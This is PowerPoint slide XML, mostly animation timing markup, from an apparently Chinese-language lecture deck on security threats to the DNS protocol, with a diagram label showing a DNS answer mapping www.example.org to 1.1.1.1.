            <a:off x="2627313" y="3284538"/>
            <a:ext cx="3240087" cy="58578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④ www.example.org=1.1.1.1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ID=111</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">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p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49157"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49157"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49157"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="10" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="49156"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49156"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49156"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49156"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="15" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="49158"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49158"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49158"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49158"/>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49160"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49160"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49160"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49160"/>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9161"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49161"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49161"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4916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9159"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49159"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49159"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4915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9163"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49163"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="41" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="42" presetID="54" presetClass="entr" presetSubtype="0" accel="100000" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="49166"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49166"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.05"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49166"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49166"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-.2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49166"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4916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49164"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49164"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="54" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="55" presetID="54" presetClass="entr" presetSubtype="0" accel="100000" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="49167"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49167"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.05"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49167"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="59" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49167"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-.2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49167"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="491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9165"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="66" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49165"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="67" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="68" presetID="54" presetClass="entr" presetSubtype="0" accel="100000" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="69" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="49168"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="70" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49168"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.05"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="71" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49168"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="72" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49168"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-.2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="73" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49168"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="74" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="491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49162"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="79" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49162"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="80" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="81" presetID="54" presetClass="entr" presetSubtype="0" accel="100000" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="82" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="49169"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="83" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49169"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.05"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="84" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49169"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="85" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49169"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-.2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="86" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49169"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="87" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49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bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="49160" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="49161" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="49162" grpId="0" animBg="1"/>
      <p:bldP spid="49163" grpId="0" animBg="1"/>
      <p:bldP spid="49164" grpId="0" animBg="1"/>
      <p:bldP spid="49165" grpId="0" animBg="1"/>
      <p:bldP spid="49166" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="49167" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="49168" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="49169" grpId="0" bldLvl="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237ABDC3-0F73-47A1-B0D0-C8E53F6FAE0E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
              </a:rPr>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="898989"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150531" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>域名服务协议安全威胁</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
